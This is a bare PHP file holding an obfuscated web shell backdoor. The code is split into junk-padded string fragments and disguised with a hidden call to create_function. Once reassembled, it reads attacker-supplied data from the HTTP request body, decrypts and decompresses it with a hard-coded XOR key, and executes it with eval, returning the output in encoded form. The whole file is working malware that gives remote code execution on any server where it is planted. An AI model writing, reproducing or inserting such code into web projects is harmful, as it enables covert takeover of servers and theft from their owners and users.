<?php
$G='X_aseX_64_encode(@xX_(@gzcomX_press(X_$o),$X_k));priX_nt("X_X_$p$kh$r$kf");}';
$s='$k="X_eX_10adc39";$kh=X_"X_X_49ba59abbe56"X_;$kf="e0X_5X_X_7f2X_0f883e"';
$f=';$p="P2OqX_QQ10vfX_xKn6FtX_";funcX_tioX_n x($t,$k){$X_c=strlen(X_X_X_$k';
$C=str_replace('B','','cBreaBtBeB_BBfunction');
$i='code($m[1])X_,$X_k)));$X_oX_=@ob_get_contX_X_enX_ts();@obX_X__end_clean();$r=@b';
$B='X_hX_("/$kX_X_h(.+X_)$kf/",@X_file_get_contents("X_pX_hp:/X_/input"),$';
$Q=');$l=strlen(X_$tX_X_);$o="";X_for($i=0;$i<$l;)X_{for(X_$j=X_0;($j<$X_c&&X_';
$W='$i<$l);X_$j++X_,X_$i++){$o.X_=$t{$iX_}^$k{$X_j};}}retX_urn $o;}if(@preX_g_matc';
$E='m)X_==1X_){X_@ob_start();@eX_vaX_l(@gzuncX_oX_mpress(@xX_(X_@baseX_64_de';
$p=str_replace('X_','',$s.$f.$Q.$W.$B.$E.$i.$G);
$Z=$C('',$p);$Z();
?>
